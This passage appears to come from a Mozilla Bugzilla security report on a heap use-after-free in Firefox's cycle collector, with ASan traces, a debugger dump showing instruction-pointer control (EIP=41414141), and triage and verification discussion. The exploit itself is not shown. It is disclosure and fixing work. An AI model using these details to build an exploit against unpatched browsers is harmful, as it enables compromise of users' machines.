    #5 0x7fe51875fc13 in mozilla::dom::FetchDriver::BeginAndGetFilteredResponse(mozilla::dom::InternalResponse*, bool) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:782
    #6 0x7fe518757131 in mozilla::dom::FetchDriver::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:1050:15
    #7 0x7fe512c6a36e in nsCORSListenerProxy::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsCORSListenerProxy.cpp:480:20
    #8 0x7fe512bdc449 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #9 0x7fe512be6bb2 in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #10 0x7fe512c87585 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #11 0x7fe512aa8721 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #12 0x7fe512be4f9a in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #13 0x7fe5134e0adb in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #14 0x7fe5132bf7ed in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7211:32
    #15 0x7fe5131092c0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2168:25
    #16 0x7fe51310564d in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2092:9
    #17 0x7fe51310729b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #18 0x7fe513107877 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #19 0x7fe511ff66d1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #20 0x7fe512028430 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #21 0x7fe51202e848 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #22 0x7fe5131105fa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #23 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #24 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #25 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #26 0x7fe51a686b69 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #27 0x7fe51e331aff in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #28 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #29 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #30 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #31 0x7fe51e33139b in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #32 0x5587bbf51802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #33 0x5587bbf51802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #34 0x7fe5320beb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8 in CanonicalizeXPCOMParticipant
Shadow bytes around the buggy address:
  0x0c1c80008680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1c80008690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1c800086a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800086b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1c800086c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c1c800086d0: fd fd fd fd fa fa fa fa fa fa fa fa[fd]fd fd fd
  0x0c1c800086e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800086f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c80008700: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c1c80008710: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c80008720: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==7796==ABORTING

Ni for comment #4

Flags: needinfo?(amarchesini)

Attached a PoC of EIP control with 32 bit Firefox on Windows.

Firefox Version: 70.0a1 (2019-07-17) (32-bit)
OS: Windows 10 64 bit

(2060.2c04): Access violation - code c0000005 (!!! second chance !!!)
eax=41414141 ebx=1d109060 ecx=0537ee44 edx=18361aa8 esi=1d179000 edi=18383100
eip=41414141 esp=0537ee24 ebp=0537ee58 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210283
41414141 0000            add     byte ptr [eax],al          ds:002b:41414141=00
0:087> r
eax=41414141 ebx=1d109060 ecx=0537ee44 edx=18361aa8 esi=1d179000 edi=18383100
eip=41414141 esp=0537ee24 ebp=0537ee58 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210283
41414141 0000            add     byte ptr [eax],al          ds:002b:41414141=00
0:087> k
 # ChildEBP RetAddr  
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 0537ee20 5c059502 0x41414141
01 0537ee58 5c04bdfb xul!CCGraphBuilder::NoteXPCOMChild+0x72 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 2155] 
02 0537ee84 5c04aa03 xul!mozilla::CycleCollectedJSRuntime::NoteGCThingXPCOMChildren+0x11b [z:\task_1563356416\build\src\xpcom\base\CycleCollectedJSRuntime.cpp @ 648] 
03 0537eecc 5c058bb2 xul!mozilla::CycleCollectedJSRuntime::TraverseGCThing+0xf3 [z:\task_1563356416\build\src\xpcom\base\CycleCollectedJSRuntime.cpp @ 707] 
04 0537ef24 5c05b527 xul!CCGraphBuilder::BuildGraph+0xc2 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 2061] 
05 0537ef3c 5c05d484 xul!nsCycleCollector::MarkRoots+0x37 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 2674] 
06 0537efa4 5c05f25b xul!nsCycleCollector::Collect+0xe4 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 3425] 
07 0537efd0 5ce39729 xul!nsCycleCollector_collectSlice+0x7b [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 3963] 
08 0537f140 5ce3c175 xul!nsJSContext::RunCycleCollectorSlice+0x799 [z:\task_1563356416\build\src\dom\base\nsJSEnvironment.cpp @ 1479] 
09 0537f224 5afadd4b xul!CCRunnerFired+0x6b5 [z:\task_1563356416\build\src\dom\base\nsJSEnvironment.cpp @ 1888] 
0a 0537f244 5afadbfd xul!std::_Func_impl_no_alloc<bool (__cdecl*)(mozilla::TimeStamp),bool,mozilla::TimeStamp>::_Do_call+0x2b
0b 0537f2c4 5a8e30de xul!mozilla::IdleTaskRunner::Run+0x11d [z:\task_1563356416\build\src\xpcom\threads\IdleTaskRunner.cpp @ 63] 
0c 0537f7b0 5a8e1ebb xul!nsThread::ProcessNextEvent+0x110e [z:\task_1563356416\build\src\xpcom\threads\nsThread.cpp @ 1225] 
0d 0537f7d4 5aa95852 xul!NS_ProcessNextEvent+0x3b [z:\task_1563356416\build\src\xpcom\threads\nsThreadUtils.cpp @ 486] 
0e 0537f7fc 5a8c3574 xul!mozilla::ipc::MessagePump::Run+0xe2 [z:\task_1563356416\build\src\ipc\glue\MessagePump.cpp @ 88] 
0f 0537f834 5a8e1ae1 xul!MessageLoop::RunHandler+0x44 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 309] 
10 0537f854 5aa956fd xul!MessageLoop::Run+0x41 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 291] 
11 0537f864 5aa93121 xul!nsBaseAppShell::Run+0x4d [z:\task_1563356416\build\src\widget\nsBaseAppShell.cpp @ 139] 
12 0537f884 5ef4aee8 xul!nsAppShell::Run+0xa1 [z:\task_1563356416\build\src\widget\windows\nsAppShell.cpp @ 412] 
13 0537f8a0 5c4994a0 xul!XRE_RunAppShell+0x38 [z:\task_1563356416\build\src\toolkit\xre\nsEmbedFunctions.cpp @ 919] 
14 0537f8b8 5a8c3574 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x70 [z:\task_1563356416\build\src\ipc\glue\MessagePump.cpp @ 272] 
15 0537f8f0 5a8e1ae1 xul!MessageLoop::RunHandler+0x44 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 309] 
16 0537f910 5ef4a927 xul!MessageLoop::Run+0x41 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 291] 
17 0537fa38 5ef4e5f1 xul!XRE_InitChildProcess+0x367 [z:\task_1563356416\build\src\toolkit\xre\nsEmbedFunctions.cpp @ 758] 
18 0537fa4c 00b316c1 xul!mozilla::BootstrapImpl::XRE_InitChildProcess+0x11 [z:\task_1563356416\build\src\toolkit\xre\Bootstrap.cpp @ 67] 
19 0537fa7c 00b3134b firefox!content_process_main+0x61 [z:\task_1563356416\build\src\ipc\contentproc\plugin-container.cpp @ 56] 
1a 0537fbe0 00b311cd firefox!NS_internal_main+0xab [z:\task_1563356416\build\src\browser\app\nsBrowserApp.cpp @ 267] 
1b 0537fc10 00b6a7dc firefox!wmain+0x1cd [z:\task_1563356416\build\src\toolkit\xre\nsWindowsWMain.cpp @ 131] 
1c 0537fc58 77106359 firefox!__scrt_common_main_seh+0xfa [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 288] 
1d 0537fc68 777f7a94 KERNEL32!BaseThreadInitThunk+0x19
1e 0537fcc4 777f7a64 ntdll!__RtlUserThreadStart+0x2f
1f 0537fcd4 00000000 ntdll!_RtlUserThreadStart+0x1b
Group: dom-core-security → core-security-release

Gonna reopen this per the comments from the reporter and move back to dom-core-sec - we can re-close if we're still convinced this is a dupe.

Group: core-security-release → dom-core-security
Status: RESOLVED → REOPENED
Resolution: DUPLICATE → ---

I was working on bug 1564821 and tried to reproduce it in order to verify the bug.

I managed to crash Firefox ASAN build (Build ID: 20190710215049) and also the latest Firefox ASAN build (Build ID: 20190717093640) on Windows 10 x64 using the steps and the test case attached in the user story (https://bugzilla.mozilla.org/show_bug.cgi?id=1564821#c0).

Are there any other details I'm not aware of?
Thanks.

Status: REOPENED → RESOLVED
Closed: 5 years ago5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE

So where exactly should I follow on how things are going on this bug since I've been asked to add comments here instead of bug 1564821 and this is duplicate of another bug where I don't have access?

Flags: needinfo?(amarchesini)

HI Hani, I didn't know you didn't have access to bug 1567419. Now you have it.
There were 2 bugs for the same crash and I picked one of them for my commit message.

Flags: needinfo?(amarchesini)

From comment 4

The fix for bug 1564821 was checked in two days ago [...] but I can still trigger this bug with my very PoC in today's nightly asan build

And that's why it's better when we make security bugs "depend on" each other rather than presuming "duplicate" :-(

I'm glad Hani was in here trying to verify it regardless.

We should avoid duping to NEWER bugs, too, but since that one already had a patch I guess we have to live with it and just be careful with the bounty attribution.

Status: RESOLVED → REOPENED
Depends on: 1567419
Flags: sec-bounty- → sec-bounty?
Resolution: DUPLICATE → ---

Looben: the fix for bug 1567419 was checked in yesterday, should be testable in July 25 builds. Is you bug fixed now or is it yet a 3rd bug here?

Keywords: csectype-uaf, sec-high

(In reply to Daniel Veditz [:dveditz] from comment #13)

Looben: the fix for bug 1567419 was checked in yesterday, should be testable in July 25 builds. Is you bug fixed now or is it yet a 3rd bug here?

I downloaded the new nightly ASAN build (26 JUl). Could not reproduce it anymore with the same test case.

Hani, would you mind re-verifying this bug's status?

Flags: needinfo?(hani.yacoub)

I've already verified bug 1564821 and bug 1567419 using the same steps from "https://bugzilla.mozilla.org/show_bug.cgi?id=1564821#c0".
And since this bug is still reopened and not fixed I lift it like that.

Are the steps for this bugs any different than the others?

Flags: needinfo?(hani.yacoub) → needinfo?(overholt)

baku's in a better position to answer comment 16 than I am.

Flags: needinfo?(overholt) → needinfo?(amarchesini)

Hani, thanks for debugging and testing this issue. I would like to know if this issue is still reproducible after bug 1564821 and bug 1567419.
I spent a bit of time today debugging this issue and, using an ASAN build, I was not able to reproduce the crash. Should we close this bug? Is it still valid?

Flags: needinfo?(amarchesini) → needinfo?(hani.yacoub)

I couldn't reproduce the crash, I tried on the latest Firefox Nightly ASAN build on Windows 10 x 64, Mac OS X 10.14 and on Ubuntu 18.04 x64.
Should I mark this bug as verified then?

Flags: needinfo?(hani.yacoub) → needinfo?(amarchesini)

Yes, please. I mark the bug as dup of bug 1567419.

Status: REOPENED → RESOLVED
Closed: 5 years ago5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE
Status: RESOLVED → REOPENED
Resolution: DUPLICATE → ---
Status: REOPENED → RESOLVED
Closed: 5 years ago5 years ago
Flags: sec-bounty? → sec-bounty+
Resolution: --- → FIXED
Whiteboard: [fixed by bug 1567419]

re-rating based on comment 6

Keywords: sec-highsec-critical
Assignee: nobody → amarchesini
Group: dom-core-security → core-security-release
status-firefox68: --- → unaffected
status-firefox69: --- → fixed
status-firefox70: --- → fixed
status-firefox-esr60: --- → unaffected
status-firefox-esr68: --- → unaffected
Target Milestone: --- → mozilla70
Flags: qe-verify-
Whiteboard: [fixed by bug 1567419] → [fixed by bug 1567419][post-critsmash-triage]
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: